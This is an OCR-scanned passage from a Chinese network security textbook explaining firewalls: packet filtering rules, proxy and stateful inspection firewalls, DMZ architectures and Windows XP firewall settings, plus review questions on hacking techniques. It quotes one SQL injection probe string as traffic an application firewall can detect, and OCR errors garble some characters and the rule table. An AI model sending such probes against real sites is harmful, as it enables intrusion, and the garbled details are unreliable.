C. 密码 破解 扫描 检测 D. 应 用 程序 扫描 检测 
E. 系统 安全 信息 扫描 检测 

二 、 简 答题 


1. 什么 是 黑客 ? 常见 的 黑客 技术 有 哪些 ? 
2. 一 般 的 网 络 攻击 有 哪些 步骤 ? 
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. 简 述 端口 扫描 的 原理 。 

.常见 的 端口 扫描 技术 有 哪些 ? 它们 的 特点 是 什么 ? 
什么 是 网 络 监 听 ? 如 何 防范 网 络 监 听 ? 

口令 破解 的 方法 有 哪些 ?如 何 防范 口令 破译 ? 

. 什么 是 拒绝 服务 攻击 ? 它 可 分 为 哪 几 类 ? 

. 简 述 缓冲 区 溢出 攻击 的 原理 及 其 危害 。 


Im 人 ww 
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71 项 目 提 出 


在 目前 网 络 受 攻击 案件 数量 直线 上 升 的 情况 下 ,用户 随 时 都 可 能 遭 到 各 种 恶意 攻击 。 

张 先 生 近 期 备 受 计算 机 病毒 的 骚扰 ,虽然 了 安装 了 反 病 毒 软件 ,但 还 是 存在 很 多 安全 隐 
患 , 如 上 网 账号 被 窃取 和 冒 用 、 银 行 账号 被 盗用 .电子 邮件 密码 被 修改 .财务 数据 被 利用 、 机 
密 档 案 丢 失 .隐私 曝光 等 ,甚至 黑客 (Hacker) 或 骇 客 (Cracker) 能 通过 远程 控制 删除 硬盘 上 
所 有 的 资料 数据 ,整个 计算 机 系统 架构 全 面 崩 溃 。 

为 了 进一步 提高 计算 机 及 网 络 的 安全 性 , 张 先 生 需 要 安装 一 款 防火 墙 软件 ,并 合理 设置 
一 些 安全 规则 ,拦截 一 些 来 历 不 明 有 害 敌 意 访问 或 攻击 行为 ,消除 安全 隐患 。 


72 项 目 分 析 


网 络 的 发 展 虽 然 为 人 们 带 来 了 许多 方便 ,可 也 带 来 了 很 多 隐患 。 随 着 网 络 的 普及 , 病 
毒 、 木 马 、 网 络 攻击 等 安全 事故 层出不穷 .安装 一 款 好 的 防火 墙 软 件 必 不 可 少 。 

Windows 系统 自 带 了 防火 墙 ,能 满足 一 般 用 户 的 需要 。 用 Internet Explorer、Outlook 
Express 等 Windows 系统 自 带 的 程序 进行 网 络 连接 ,Windows 防火 墙 是 默认 不 干预 的 。 
微软 在 设置 防火 墙 内 置 规则 时 ,已 经 为 自己 公司 的 应 用 程序 开启 了 “绿色 通道 ”, 即 使 打 
开 Windows 防火 墙 并 且 启 用 “不 允许 例外 ”功能 .未 将 Internet Explorer 设置 为 “例外 ” 程 
序 也 能 正常 上 网 ,Windows 防火 墙 也 不 会 询问 是 否 允 许 Internet Explorer 通过 。Windows 
防火 墙 能 限制 从 其 他 计算 机 发 送 来 的 信息 ,使 用 户 可 以 更 好 地 控制 自己 计算 机 上 的 数 
据 , 并 针对 那些 未 经 邀请 而 尝试 连接 的 用 户 或 程序 (包括 病毒 和 蠕虫 ) 提 供 了 一 条 安全 
防线 。 

人 们 用 得 较 多 的 还 是 第 三 方 防火 墙 软件 ,如 天 网 防火 墙 软件 等 。 天 网 防火 墙 软件 
是 一 款 网 络 安全 软件 ,根据 用 户 设 定 的 安全 规则 把 守 网 络 ,提供 强大 的 访问 控制 、 信 息 
过 滤 等 功能 ,从 而 抵御 网 络 人 侵 和 攻击 ,防止 信息 泄露 。 天 网 防火 墙 把 网 络 分 为 本 地 
网 和 互联 网 ,可 针对 来 自 不 同 网 络 的 信息 设置 不 同 的 安全 方案 ,适用 于 以 任何 方式 上 
网 的 用 户 。 
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73 相关 知识 点 


7.3.1 防火 墙 结构 概述 


以 前 当 构 筑 和 使 用 木 结构 房屋 的 时 候 , 为 防止 火灾 的 发 生 和 蔓延 ,人 们 将 坚固 的 石 块 堆 
砌 在 房屋 周围 作为 屏障 ,这 种 防护 构筑 物 被 称 为 防火 墙 (FireWall) 。 如 今 ,人 们 借助 这 个 概 
念 ,使 用 “防火 墙 ”来 保护 敏感 的 数据 不 被 窃取 和 算 改 。 不 过 .这 种 防火 墙 是 由 先进 的 计算 机 
系统 构成 的 。 防 火 墙 犹如 一 道 护栏 隔 在 被 保护 的 内 部 网 与 不 安全 的 非 信任 网 络 之 间 , 用 来 
保护 计算 机 网 络 免 受 非 授权 人 员 的 骚扰 与 黑客 的 入侵 。 

防火 墙 可 以 是 非常 简单 的 过 滤器 ,也 可 能 是 精心 配置 的 网 关 , 但 它们 的 原理 是 一 样 的 ， 
都 用 于 监测 并 过 滤 所 有 内 部 网 和 外 部 网 之 间 的 信息 交换 。 防 火 墙 通常 是 运行 在 一 台 单独 计 
算 机 之 上 的 一 个 特别 的 服务 软件 , 它 可 以 识别 并 屏蔽 非法 的 请 求 ,保护 内 部 网 络 敏感 的 数据 
不 被 偷窃 和 破坏 ,并 记录 内 外 网 通信 的 有 关 状 态 信息 ,如 通信 发 生 的 时 间 和 进行 的 操作 等 。 

防火 墙 技 术 是 一 种 有 效 的 网 络 安全 机 制 , 它 主要 用 于 确定 哪些 内 部 服务 允许 外 部 访问 ， 
以 及 允许 哪些 外 部 服务 访问 内 部 服务 。 其 基本 准则 就 是 :一 切 未 被 允许 的 就 是 禁止 的 ;一 切 
未 被 禁止 的 就 是 允许 的 。 

防火 墙 是 建立 在 现代 通信 网 络 技术 和 信息 安全 技术 基础 上 的 应 用 性 安全 技术 ,并 越 来 
越 多 地 应 用 于 专用 网 与 公用 络 的 互联 环境 之 中 。 

防火 墙 应 该 是 不 同 网 络 或 网 络 安 全 域 之 间 信息 的 唯一 出 入 口 ,能 根据 企业 的 安全 策略 
控制 (允许 ,拒绝 监测) 出 入 网 络 的 信息 流 , 且 本 身 具 有 较 强 的 抗 攻 击 能 力 , 是 提供 信息 安全 
服务 ,实现 网 络 和 信息 安全 的 基础 设施 。 在 逻辑 上 ,防火 墙 是 一 个 分 离 器 ,一 个 限制 器 ,也 是 
一 个 分 析 器 , 它 能 有 效 监控 内 部 网 和 外 部 网 之 间 的 任何 活动 ,保证 了 内 部 网 络 的 安全 。 其 结 
构 如 图 7-1 所 示 。 


图 7-1 防火 墙 结构 示意 图 
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防火 墙 具 有 如 下 作用 。 

(1) 防火 墙 是 网 络 安全 的 屏障 。 由 于 只 有 经 过 精心 选择 的 应 用 协议 才能 通过 防火 墙 ， 
所 以 防火 墙 ( 作 为 阻塞 点 .控制 点 ) 能 极 大 地 提高 内 部 网 络 的 安全 性 ,并 通过 过 滤 不 安全 的 服 
务 而 降低 风险 ,使 网 络 环境 变 得 更 安全 。 防 火 墙 同时 可 以 保护 网 络 免 受 基于 路 由 的 攻击 ,如 
IP 选项 中 的 源 路 由 攻击 和 ICMP 重 定向 中 的 重 定向 路 径 等 。 

(2) 防火 墙 可 以 强化 网 络 安全 策略 。 通 过 以 防火 墙 为 中 心 的 安全 方案 配置 ,能 将 所 
有 安全 软件 (如 口令 、 加 密 、 身 份 认 证 、 审 计 等 ) 配 置 在 防火 墙 上 。 与 将 网 络 安全 问题 分 散 
到 各 个 主机 上 相 比 ,防火 墙 的 集中 安全 管理 更 经 济 。 例 如 ,在 网 络 访问 时 的 “一 次 一 密 ” 
口令 系统 ( 即 每 一 次 加 密 都 使 用 一 个 不 同 的 密 钥 ) 和 其 他 的 身份 认证 系统 完全 可 以 集中 
在 防火 墙 上 。 

(3) 对 网 络 存 取 和 访问 进行 监控 审计 。 如 果 所 有 的 访问 都 经 过 防火 墙 , 那 么 ,防火 墙 就 
能 记录 下 这 些 访问 并 做 出 日 志 记录 ,同时 也 能 提供 网 络 使 用 情况 的 统计 数据 。 当 发 生 可 疑 
动作 时 ,防火 墙 能 进行 适当 的 报警 ,并 提供 网 络 是 否 受 到 探测 和 攻击 的 详细 信息 。 另 外 , 收 
集 一 个 网 络 的 使 用 和 误 用 情况 也 是 非常 重要 的 ,这 样 可 以 清楚 防火 墙 是 否 能 够 抵挡 攻击 者 
的 探测 和 攻击 ,清楚 防火 墙 的 控制 是 否 充 分 。 而 网 络 使 用 统计 对 网 络 需 求 分 析 和 威胁 分 析 
等 而 言 也 是 非常 重要 的 。 

(4) 防止 内 部 信息 的 外 泄 。 通 过 防火 墙 对 内 部 网 络 的 划分 .可 实现 对 内 部 网 络 重点 
网 段 的 隔离 ,从 而 限制 局 部 重点 或 敏感 网 络 安全 问题 对 全 局 网 络 造成 的 影响 。 再 者 , 隐 
私 是 内 部 网 络 非常 关心 的 问题 ,一 个 内 部 网 络 中 不 引 人 注 意 的 细节 可 能 包含 了 有 关 安 全 
的 线索 而 引起 外 部 攻击 者 的 兴趣 ,甚至 因此 暴露 了 内 部 网 络 的 某 些 安全 漏洞 。 使 用 防火 
墙 就 可 以 隐蔽 那些 暴露 内 部 细节 的 服务 ,例如 Finger( 用 来 查询 使 用 者 的 资料 )、.DNS( 域 
名 系统 ) 等 服务 。Finger 显示 了 主机 的 所 有 用 户 的 注册 名 、 真 名 .最 后 登录 时 间 和 使 用 
shell 类 型 等 。 但 是 Finger 显示 的 信息 非常 容易 被 攻击 者 所 获悉 。 攻 击 者 可 以 由 此 而 知 
道 一 个 系统 使 用 的 频繁 程度 ,这 个 系统 是 否 有 用 户 正 在 上 网 ,这 个 系统 是 否 在 被 攻击 时 
引起 注意 等 。 防 火 墙 可 以 同样 阻塞 有 关内 部 网 络 中 的 DNS 信息 ,这样 一 台 主 机 的 域名 和 
IP 地 址 就 不 会 被 外 界 所 了 解 。 除 了 安全 作用 以 外 ,防火 墙 通常 还 支持 VPN( 虚 拟 专用 网 ) 
功能 。 

防火 墙 也 有 其 局 限 性 ,因为 存在 着 一 些 防火 墙 不 能 防范 的 安全 威胁 ,如 防火 墙 不 能 
防范 不 经 过 防火 墙 的 攻击 (例如 ,如 果 允 许 从 受 保护 的 网 络 内 部 向 外 拨号 ,一 些 用 户 就 可 
能 形成 与 因特网 的 直接 连接 )。 另 外 .防火 墙 很 难 防范 来 自 网 络 内 部 的 攻击 以 及 病毒 的 
威胁 等 。 


7.3.2 防火 墙 技术 原理 

根据 防范 的 方式 和 侧重 点 的 不 同 ,防火 墙 技术 原理 可 分 成 很 多 类 型 ,但 总 体 来 讲 可 分 为 
三 大 类 : 包 过 滤 防 火 墙 .代理 防火 墙 和 状态 检测 防火 墙 。 

1. 包 过 滤 防 火 墙 


包 过 滤 防 火 墙 是 日 前 使 用 最 广泛 的 防火 墙 ,其 作用 于 网 络 层 和 传输 层 ,通常 安装 在 
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路 由 器 上 ,对 数据 包 进行 过 滤 选 择 。 它 根据 数据 包 中 的 源 耳 地 址 .目的 了 了 地址 .TCP/ 
UDP 的 源 端口 号 和 日 的 端口 号 ,协议 类 型 (TCP/UDP/ICMP/IP tunnel) 和 数据 包 中 的 各 
种 标志 位 等 参数 ,与 用 户 预 定 的 访问 控制 表 进行 比较 ,判断 数据 包 是 否 符合 预先 制定 的 
安全 策略 ,决定 数据 包 的 转发 或 丢弃 , 即 实 施 信息 过 滤 。 实 际 上 , 它 一 般 允 许 网 络 内 部 的 
主机 直接 访问 外 部 网 络 , 而 外 部 网 络 上 的 主机 对 内 部 网 络 的 访问 则 要 受到 限制 。 

Internet 上 的 某 些 特定 服务 一 般 都 使 用 相对 固定 的 端口 号 ,因此 路 由 器 在 设置 包 过 滤 
规则 时 指定 ,对 于 某 些 端口 号 允许 数据 包 与 该 端口 交换 ,或 者 阻 断 数据 包 与 它们 的 连接 。 

包 过 滤 规 则 定义 在 转发 控制 表 中 ,数据 包 遵循 自 上 而 下 的 次 序 依 次 运用 每 一 条 规则 , 直 
到 遇 到 与 其 相 匹配 的 规则 为 止 。 对 数据 包 可 采取 的 操作 有 转发 .丢弃 、 报 错 等 。 根 据 不 同 的 
实现 方式 , 包 过 滤 可 以 在 进入 防火 墙 时 进行 ,也 可 以 在 离开 防火 墙 时 进行 。 

表 7-1 是 常见 的 包 过 滤 转 发 控制 表 。 

表 7-1 包 过 滤 转 发 控制 表 


规则 序号 | 传输 方向 | 协议 类 型 | 源 地 址 | 源 端口 号 | 目的 地 址 | 目的 端口 号 | 控制 操作 
1 In TCP 外 部 | 之 1023 内 部 80 Allow 
2 Out TCP 内 部 80 外 部 >1023 Allow 
3 Out TCP 内 部 >1023 外 部 80 Allow 
4 In TCP 外 部 80 内 部 >1023 Allow 
5 Both * * * * * Deny 


注 : 表 中 的 * 表示 任意 


表 7-1 中 的 规则 1、 规则 2 允许 外 部 主机 访问 本 站 点 的 WWW 服务 器 ,规则 3、 规 则 4 允 
许 内 部 主机 访问 外 部 的 WWW 服务 器 。 由 于 服务 器 可 能 使 用 非 标准 端口 号 ,给 防火 墙 允许 
的 配置 带 来 一 些 麻 烦 。 实 际 使 用 的 防火 墙 都 直接 对 应 用 协议 进行 过 滤 , 即 管理 员 可 在 规则 
中 指明 是 否 允 许 HTTP 通过 ,而 不 是 只 关注 80 端口 。 

规则 5 表示 除了 规则 1 一 4 允许 的 数据 包 通过 外 .其 他 所 有 数据 包 一 律 禁止 通过 , 即 一 
切 未 被 允许 的 就 是 禁止 的 。 

包 过 滤 防 火 墙 的 优点 是 简单 方便、 速度 快 ,对 用 户 透 明 , 对 网 络 性 能 影响 不 大 。 其 
缺点 是 :不 能 彻底 防止 IP 地 址 欺骗 ;一 些 应 用 协议 不 适合 于 数据 包 过 滤 ;缺乏 用 户 认证 机 
制 ;正常 的 数据 包 过 滤 路 由 器 无 法 执行 某 些 安全 策略 。 因 此 , 包 过 滤 防 火 墙 的 安全 性 
较 差 。 


2. 代理 防火 墙 


首先 介绍 一 下 代理 服务 器 ,代理 服务 器 作为 一 个 为 用 户 保密 或 者 突破 访问 限制 的 数据 
转发 通道 ,在 网 络 上 应 用 广泛 。 一 个 完整 的 代理 设备 包含 一 个 代理 服务 器 端 和 一 个 代理 客 
户 端 ,代理 服务 器 端 接收 来 自用 户 的 请 求 ,调用 自身 的 代理 客户 端 模拟 一 个 基于 用 户 请 求 的 
连接 到 目标 服务 器 ,再 把 目标 服务 器 返回 的 数据 转发 给 用 户 .完成 一 次 代理 工作 过 程 。 其 工 
作 过 程 如 图 7-2 所 示 。 
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代理 截获 客户 机 和 服务 器 之 
间 的 通信 ， 和 合作 和 村人 


i 
图 7-2 代理 防火 墙 的 工作 过 程 


也 就 是 说 ,代理 服务 器 通常 运行 在 两 个 网 络 之 间 ,是 客户 机 和 真实 服务 器 之 间 的 中 介 ， 
代理 服务 器 彻底 隔断 内 部 网 络 与 外 部 网 络 的 “直接 ”通信 ,内 部 网 络 的 客户 机 对 外 部 网 络 的 
服务 器 的 访问 , 变 成 了 代理 服务 器 对 外 部 网 络 的 服务 器 的 访问 ,然后 由 代理 服务 器 转发 给 内 
部 网 络 的 客户 机 。 代 理 服务 器 对 于 内 部 网 络 的 客户 机 像 是 一 台 服 务 器 ,而 对 于 外 部 网 络 的 
服务 器 ,又 像 是 一 台 客 户 机 

如 果 在 一 台 代理 设备 的 代理 服务 器 端 和 代理 客户 端 之 间 连 接 一 个 过 站 措施 ,就 成 了 “应 
用 代理 ”防火 墙 ,这 种 防火 墙 实际 上 就 是 一 台 小 型 的 带 有 数据 “检测 、. 过 滤 ? 功 能 的 透明 代理 
服务 器 ,但 是 并 不 是 单纯 的 在 一 个 代理 设备 中 岩 入 包 过 滤 技 术 , 而 是 一 种 被 称 为 “应 用 协议 
分 析 ”(Application Protocol Analysis) 的 技术 。 所 以 也 经 常 把 代理 防火 墙 称 为 代理 服务 器 、 
应 用 网 关 , 工 作 在 应 用 层 ,适用 于 某 些 特定 的 服务 ,如 HTTP、FTP 等 。 其 工作 原理 如 
图 7-3 所 示 。 


图 7-3 代理 防火 墙 的 工作 原理 


应 用 协议 分 析 ” 技 术 工 作 在 OSI 模型 的 应 用 层 上 ,在 这 一 层 能 接触 到 的 所 有 数据 都 是 

最 终 形式 ,也 就 是 说 ,防火 墙 “看 到 ”的 数据 与 最 终 用 户 看 到 的 是 一 样 的 ,而 不 是 一 个 个 带 着 
地 址 端口 协议 等 原始 内 容 的 数据 包 . 因 而 可 以 实现 更 高 级 的 数据 检测 过 程 。 

“应 用 协议 分 析 ” 模 块 便 根 据 应 用 层 协议 处 理 这 个 数据 ,通过 预 置 的 处 理 规则 查询 这 个 
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数据 是 否 带 有 危害 。 由 于 这 一 层面 对 的 已 经 不 再 是 组 合 有 限 的 报 文 协议 ,可 以 识别 HTTP 
头 中 的 内 容 , 如 进行 域名 的 过 滤 ,甚至 可 识别 类 似 于 “GET /sql. asp? id 一 1 and 1” 的 数据 内 
容 , 所 以 防火 墙 不 仅 能 根据 数据 应 用 层 提供 的 信息 判断 数据 .更 能 像 管理 员 分 析 服 务 器 日 志 
那样 “看 "内容 辨别 危害 。 

代理 防火 墙 就 是 一 台 小 型 的 带 有 数据 “检测 、 过 滤 ” 功 能 的 透明 “代理 服务 器 ”, 有 时 人 们 
把 代理 防火 墙 也 称 为 代理 服务 器 ,代理 服务 器 工作 在 应 用 层 , 针 对 不 同 的 应 用 协议 ,需要 建 
立 不 同 的 服务 代理 ,如 HTTP 代理 .FTP 代理 .POP3 代理 .Telnet 代理 、SSL 代理 、Socks 
代理 等 。 

代理 防火 墙 的 特点 是 完全 “阻隔 "* 了 网 络 通 信 流 ,通过 对 每 种 应 用 服务 编制 专门 的 代理 
程序 ,实现 监视 和 控制 应 用 层 通信 流 的 作用 。 与 包 过 滤 防 火 墙 不 同 之 处 在 于 ,内 部 网 和 外 部 
网 之 间 不 存在 直接 连接 ,同时 提供 审计 和 日 志 服务 。 实 际 中 的 代理 防火 墙 通常 由 专用 工作 
站 来 实现 ,如 图 7-4 所 示 。 


内 部 主机 


图 7-4 代理 防火 墙 


代理 防火 墙 是 内 部 网 与 外 部 网 的 隔离 点 ,工作 在 OSI 模型 的 最 高 层 ,掌握 着 应 用 系统 
中 可 用 作 安 全 决策 的 全 部 信息 ,起 着 监视 和 隔绝 应 用 层 通信 流 的 作用 。 其 优点 是 可 以 检查 
应 用 层 、 传 输 层 和 网 络 层 的 协议 特征 ,对 数据 包 的 检测 能 力 比较 强 。 其 缺点 主要 是 难以 配置 
和 处 理 速度 较 慢 。 


3. 状态 检测 防火 墙 


状态 检测 技术 是 基于 会 话 层 的 技术 ,对 外 部 的 连接 和 通信 行为 进行 状态 检测 ,阻止 具有 
攻击 性 可 能 的 行为 .从 而 可 以 抵御 网 络 攻 击 。 

Internet 上 传输 的 数据 都 必须 遵循 TCP/IP 协议 。 根 据 TCP 协议 ,每 个 可 靠 连 接 的 
建立 需要 经 过 “客户 端 同步 请 求 "、“ 服 务 器 应 答 ”、“ 客 户 端 再 应 答 ”3 个 阶段 ( 即 三 次 握 
手 ) ,如 常用 的 Web 浏览、 文件 下 载 和 收发 邮件 等 都 要 经 过 这 3 个 阶段 ,这 反映 出 数据 包 
并 不 是 独立 的 ,而 是 前 后 之 间 有 着 密切 的 状态 联系 ,基于 这 种 状态 变化 ,引出 了 状态 检测 
技术 。 

状态 检测 防火 墙 气 弃 了 包 过 滤 防 火 墙 仅 检 查 数据 包 的 IP 地 址 等 几 个 参数 ,而 不 关心 数 
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据 包 连接 状态 变化 的 缺点 ,在 防火 墙 的 核心 部 分 建立 状态 连接 表 , 并 将 进出 网 络 的 数据 当成 
一 个 个 的 会 话 , 利 用 状态 连接 表 跟 踪 每 一 个 会 话 状态 。 状 态 检测 对 每 一 个 数据 包 的 检查 不 
仅 根据 规则 表 , 还 考虑 了 数据 包 是 否 符 合 会 话 所 处 的 状态 ,因此 提供 了 完整 的 对 传输 层 的 控 
制 能 力 。 

状态 检测 技术 采用 了 一 系列 优化 技术 ,使 防火 墙 性 能 大 幅度 提升 ,能 应 用 在 各 类 网 
络 环境 中 ,尤其 是 在 一 些 规则 复杂 的 大 型 网 络 上 。 任 何 一 款 高 性 能 的 防火 墙 ,都 会 采用 
状态 检测 技术 。 国 内 著名 的 防火 墙 公 司 ,如 北京 天 融 信 等 公司 ,2000 年 就 开始 采用 状态 
检测 技术 ,并 在 此 基础 上 创新 推出 了 核 检测 技术 ,在 实现 安全 目标 的 同时 可 以 得 到 极 高 
的 性 能 。 


7.3.3 ”防火 墙 体系 结构 

网 络 防火 墙 的 安全 体系 结构 基本 上 可 分 为 4 种 : 包 过 滤 路 由 器 防火 墙 结构 、 双 宿主 主机 
防火 墙 结构 .屏蔽 主机 防火 墙 结 构 和 屏蔽 子 网 防火 墙 结构 。 

1. 包 过 滤 路 由 器 防火 墙 结构 


在 传统 的 路 由 器 中 增加 包 过 滤 功能 就 能 形成 这 种 简单 的 防火 墙 。 这 种 防火 墙 的 好 处 是 
完全 透明 ,但 由 于 是 在 单机 上 实现 ,形成 了 网 络 中 的 * 单 失效 点 "”。 由 于 路 由 器 的 基础 功能 是 
转发 数据 包 , 一 旦 过 滤 机 能 失效 ,被 入 侵 就 会 形成 网 络 直通 状态 ,任何 非法 访问 都 可 以 进入 
内 部 网 络 。 这 种 防火 墙 尚 不 能 提供 有 效 的 安全 功能 , 仅 在 早期 的 网 络 中 应 用 。 包 过 滤 路 由 


器 防火 墙 的 基本 结构 如 图 7-5 所 示 。 
人 


包 过 滤 路 由 器 


内 部 网 络 


图 7-5 包 过 滤 路 由 器 防火 墙 结构 


2. 双 宿 主 主 机 防火 墙 结构 


该 结构 至 少 由 具有 两 个 接口 ( 即 两 块 网 卡 ) 的 双 宿 主 主 机 ( 堡 公 主机) 而 构成 。 双 宿主 主 
机 的 一 个 接口 接 内 部 网 络 , 另 一 个 接口 接 外 部 网 络 。 内 、 外 网 络 之 间 不 能 直接 通信 ,必须 通 
过 双 宿 主 主机 上 的 应 用 层 代理 服务 来 完成 ,其 结构 如 图 7-6 所 示 。 一 旦 黑客 侵入 堡垒 主机 
并 使 其 具有 路 由 功能 ,那么 防火 墙 将 变 得 无 用 。 

该 结构 的 优点 是 网 络 结构 简单 .有 较 好 的 安全 性 .可 以 实现 身份 鉴别 和 应 用 层 数据 过 
滤 。 但 当 外 部 用 户 人 侵 堡垒 主机 时 ,可 能 导致 内 部 网 络 处 于 不 安全 的 状态 。 
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图 7-6 双 宿 主 主机 防火 墙 结构 


3. 屏蔽 主机 防火 墙 结构 


该 结构 的 防火 墙 由 包 过 滤 路 由 器 和 运行 网 关 软 件 的 堡垒 主机 构成 。 该 结构 提供 安全 
保护 的 堡垒 主机 仅 与 内 部 网 络 相连 ,而 包 过 滤 路 由 器 位 于 内 部 网 络 和 外 部 网 络 之 间 , 如 
图 7-7 所 示 。 


图 7-7 屏蔽 主机 防火 墙 结构 


通常 在 路 由 器 上 设立 过 滤 规 则 ,使 得 堡垒 主机 成 为 从 外 部 网 络 唯一 可 直接 到 达 的 主机 ， 
这 确保 了 内 部 网 络 不 受 未 被 授权 的 外 部 用 户 的 攻击 。 屏 项 主机 防火 墙 实现 了 网 络 层 和 应 用 
层 的 安全 ,因而 比 单纯 的 包 过 滤 防 火 墙 更 安全 。 在 这 一 方式 下 . 包 过 滤 路 由 器 是 否 配置 正 
确 , 是 这 种 防火 墙 安全 与 否 的 关键 。 如 果 路 由 表 遭 到 破坏 ,堡垒 主机 就 可 能 被 越过 ,使 内 部 
网 络 完全 暴露 。 


4. 屏蔽 子 网 防火 墙 结构 


该 防火 墙 结构 如 图 7-8 所 示 ,采用 了 两 个 包 过 滤 路 由 器 和 一 个 堡垒 主机 ,在 内 外 网 络 
之 间 建 立 了 一 个 被 隔离 的 子 网 ,通常 称 为 非 军 事 区 (DMZ 区 )。 可 以 将 各 种 服务 器 (如 
WWW 服务 器 .FTP 服务 器 等 ) 置 于 DMZ 区 中 ,解决 了 服务 器 位 于 内 部 网 络 带 来 的 不 安 
全 问题 。 

由 于 采用 两 个 路 由 器 进行 了 双重 保护 ,外 部 攻击 数据 很 难 进 入 内 部 网 络 。 外 网 用 户 
通过 DMZ 区 中 的 服务 器 访问 企业 的 网 站 ,而 不 需要 进入 内 网 。 在 这 一 配置 中 ,即使 保全 
主机 被 人 侵 者 控制 ,内 部 网 络 仍然 受到 内 部 包 过 滤 路 由 器 的 保护 ,避免 了 “ 单 点 失效 ”的 
问题 。 
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图 7-8 屏蔽 子 网 防火 墙 结构 


上 述 几 种 防火 墙 结构 是 允许 调整 和 改动 的 ,如 合并 内 外 路 由 器 、 合 并 堡垒 主机 和 外 部 路 
由 器 、 合 并 堡垒 主机 和 内 部 路 由 器 等 ,由 防火 墙 承担 合并 部 分 的 合并 前 的 功能 。 


7.3.4 Windows 防火 博 


Windows XP Service Pack 2(SP2) 为 连接 到 互联 网 上 的 小 型 网 络 提供 了 增强 的 防火 墙 
安全 保护 。 默 认 情 况 下 ,会 启用 Windows 防火 墙 ,以 便 帮 助 保护 所 有 互联 网 和 网 络 连 接 。 
用 户 还 可 以 下 载 并 安装 自己 选择 的 防火 墙 。 用 户 可 以 将 防火 墙 视 为 一 道 屏障 , 它 检查 来 自 
互联 网 或 网 络 的 信息 ,然后 根据 防火 墙 设置 ,拒绝 
信息 或 允许 信息 到 达 计 算 机 ,如 图 7-9 所 示 。 

当 互联 网 或 网 络 上 的 某 人 尝试 连接 到 用 户 的 
计算 机 时 ,这 种 尝试 称 为 “未 经 请 求 的 请 求 ”。 当 
收 到 * 未 经 请 求 的 请 求 " 时 , Windows 防火 墙 会 阻 
止 该 连接 。 如 果 和 运行 的 程序 (如 即时 消息 程序 或 
多 人 网 络 游戏 ) 需 要 从 互联 网 或 网 络 接收 信息 , 那 
么 防火 墙 会 询问 阻止 连接 还 是 取消 阻止 (允许 ) 连 图 7-9 Windows 防火 墙 的 工作 方式 
接 。 如 果 选 择 取 消 阻 止 连接 ,Windows 防火 墙 将 创建 一 个 “例外 ”, 这 样 当 该 程序 日 后 需要 
接收 信息 时 ,防火 墙 就 会 允许 信息 到 达 用 户 的 计算 机 。 虽 然 可 以 为 特定 互联 网 连接 和 网 络 
连接 关闭 Windows 防火 墙 ,但 这 样 做 会 增加 计算 机 安全 性 受到 威胁 的 风险 。 

Windows 防火 墙 有 3 种 设置 :“ 开 ”“ 开 并 且 无 例外 ”和 “ 关 ”。 

Q@@“ 开 ”:Windows 防火 墙 在 默认 情况 下 处 于 打开 状态 ,而 且 通 常 应 当 保留 此 设置 不 变 。 
选择 此 设置 时 ,Windows 防火 墙 阻止 所 有 未 经 请 求 的 连接 ,但 不 包括 那些 对 “例外 ?选项 卡 
中 选中 的 程序 或 服务 发 出 的 请 求 。 

@“ 开 并 且 无 例外 ”: 当 选中 “不 允许 例外 ” 复 选 框 时 .Windows 防火 墙 会 阻止 所 有 未 经 
请 求 的 连接 ,包括 那些 对 “例外 ”选项 卡 中 选中 的 程序 或 服务 发 出 的 请 求 。 当 需要 为 计算 机 
提供 最 大 限度 的 保护 时 (例如 , 当 用 户 连 接 到 旅馆 或 机 场 中 的 公用 网 络 时 ,或 者 当 危 险 的 病 
毒 或 蠕虫 正在 互联 网 上 扩散 时 ) ,可 以 使 用 该 设置 。 但 是 ,不 必 始 终 选择 * 不 允许 例外 ”, 其 原 
因 在 于 ,如 果 该 选项 始终 处 于 选中 状态 , 某 些 程序 可 能 会 无 法 正常 工作 ,并 且 文 件 和 打印 机 
共享 .远程 协助 和 远程 桌面 、 网 络 设备 发 现 、 例 外 列表 上 预 配置 的 程序 和 服务 以 及 已 添加 到 
例外 列表 中 的 其 他 项 等 服务 会 被 禁止 接受 未 经 请 求 的 请 求 。 

如 果 选 中 “不 允许 例外 ” 复 选 框 ,仍然 可 以 收发 电子 邮件 、 使 用 即时 消息 程序 或 浏览 大 多 
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数 网 页 。 

加 “ 关 ”: 此 设置 将 关闭 Windows 防火 墙 。 选 择 此 设置 时 ,计算 机 更 容易 受到 未 知人 侵 
者 或 互联 网 病毒 的 侵害 。 此 设置 只 应 由 高 级 用 户 用 于 计算 机 管理 目的 ,或 者 在 计算 机 有 其 
他 防火 墙 保护 的 情况 下 使 用 。 

Windows 防火 墙 只 阻截 所 有 传人 的 未 经 请 求 的 流量 ,对 主动 请 求 传 出 的 流量 不 作 理 
会 。 而 第 三 方 防火 墙 软件 一 般 都 会 对 两 个 方向 的 访问 进行 监控 和 审核 ,这 一 点 是 它们 之 间 
最 大 的 区 别 。 

Windows 防火 墙 能 做 到 和 不 能 做 到 的 功能 情况 如 表 7-2 所 示 。 

表 7-2 Windows 防火 墙 的 功能 
能 做 到 不 能 做 到 


检测 或 禁止 计算 机 病毒 和 蠕虫 (如 果 它 们 已 经 在 你 的 计算 机 上 )。 由 于 
阻止 计算 机 病毒 和 蠕虫 到 达 | 这 个 原因 ,还 应 该 安装 反 病 毒 软件 并 及 时 进行 更 新 ,以 防范 病毒 .蠕虫 
你 的 计算 机 和 其 他 安全 威胁 破坏 你 的 计算 机 或 使 用 你 的 计算 机 将 病毒 扩散 到 其 他 
计算 机 


阻止 你 打开 带 有 危险 附件 的 电子 邮件 。 不 要 打开 来 自 不 认识 的 发 件 人 
的 电子 邮件 附件 。 即 使 你 知道 并 信任 电子 邮件 的 来 源 , 仍 然 要 格外 小 
心 。 如 果 你 认识 的 某 个 人 向 你 发 送 了 电子 邮件 附件 ,请 在 打开 附件 前 
仔细 查看 主题 行 。 如 果 主 题 行 比较 杂乱 或 者 你 认为 没有 任何 意义 , 那 
么 请 在 打开 附件 前 向 发 件 人 确认 


请 求 你 的 允许 ,以 阻止 或 取消 
阻止 某 些 连接 请 求 


创建 记录 (安全 日 志 ), 可 用 于 
记录 对 计算 机 的 成 功 连接 尝 | 阻止 垃圾 邮件 或 未 经 请 求 的 电子 邮件 出 现在 你 的 收 件 箱 中 。 不 过 , 某 
试 和 不 成 功 的 连接 尝试 ,可 用 | 些 电 子 邮 件 程序 可 以 帮助 你 做 到 这 一 点 

作 故 障 排除 工具 


7.3.5 天 网 防火 载 


天 网 防火 墙 个 人 版 SkyNet FireWall( 以 下 简称 为 天 网 防火 墙 ) 是 由 广州 众 达 天 网 技术 
